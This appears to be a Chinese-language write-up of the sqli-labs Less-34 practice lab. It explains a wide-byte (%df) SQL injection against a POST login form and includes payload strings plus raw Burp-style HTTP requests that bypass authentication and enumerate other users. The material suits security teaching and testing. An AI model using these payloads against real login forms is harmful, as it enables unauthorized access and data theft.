Less-34

方法一：
這一關是POST型的注入，同樣的將post傳遞過來的內容進行了轉義處理，過濾了單引號、反斜槓。有之前的例子我們可以看到%df可以將轉義的反斜槓給吃掉。而GET型的方式我們是以url形式提交的，因此資料會通過urlencode,如何將方法用在POST型的注入當中呢？我們可以將UTF-8轉換為UTF-16或者UTF-32,例如將'轉換為utf-16為： �'。我們可以利用這一點注入。

使用萬能密碼方式來突破：

username： �'or 1=1#

passwor:aaa

方法二：

因為這裡使用到了表單的提交，所以我們可以使用burp suite進行資料的提交，之後對提交的資料進行修改：

POST /sqli-labs/Less-34/ HTTP/1.1
Host: 192.168.11.136
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Referer: http://192.168.11.136/sqli-labs/Less-34/
Cookie: PHPSESSID=6govstesrml4muhgt7sshceom1
Connection: close
Upgrade-Insecure-Requests: 1

uname=admin%df'||1#&passwd=aaa&submit=Submit

從上面我們可以看到，我們並沒有輸入密碼，卻成功登入了，已越權

或者可以這樣，獲取別的使用者的資訊，實現水平越權：

POST /sqli-labs/Less-34/ HTTP/1.1
Host: 192.168.11.136
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Referer: http://192.168.11.136/sqli-labs/Less-34/
Cookie: PHPSESSID=6govstesrml4muhgt7sshceom1
Connection: close
Upgrade-Insecure-Requests: 1

uname=admin%df'or 1 limit 1,1#&passwd=aaa&submit=Submit

post型盲注通殺payload：

uname=admin%df'or()or%200%23&passwd=&submit=Submit